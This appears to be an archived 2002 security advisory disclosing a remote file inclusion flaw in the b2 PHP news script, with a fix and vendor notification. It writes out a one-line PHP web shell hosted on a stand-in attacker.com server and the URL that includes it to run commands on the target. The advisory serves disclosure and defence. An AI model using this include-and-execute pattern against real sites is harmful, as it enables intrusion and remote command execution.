('binary' encoding is not supported, stored as-is) Site: www.cafelog.com Vulnerable: b2 0.6pre2 and earlier. B2 is a php script which allows webmasters to quikly post news on the frontpage and let viewers interact with eachother. A bug exists in the scripts which allows an attacker to remotely execute commands. Exploit: Taken from /b2-include/b2edit.showposts.php *snippet* <?php include_once ("b2config.php"); include_once ($b2inc."/b2functions.php"); *snippet* But since b2config.php does not exist inside the directory, an attacker can define $b2inc himself. So if the attacker creates a file on his server, for example www.attacker.com , called b2functions.php, and he writes the following in it : <? system($cmd); ?> (note : the attacker's server must not be able to run php, it has to open the file as text) he can include the file like this : http://www.vulnerablehost.com/b2/b2- include/b2edit.showposts.php?b2inc=http://www.attacker.com&c md=ls This would execute the ls command on vulnerablehost.com. Fix: Copy b2config.php into the b2-include directory The vendor has been warned, and already released the same fix a few days earlier.
This archive was generated by hypermail 2b30 : Mon May 06 2002 - 08:05:31 PDT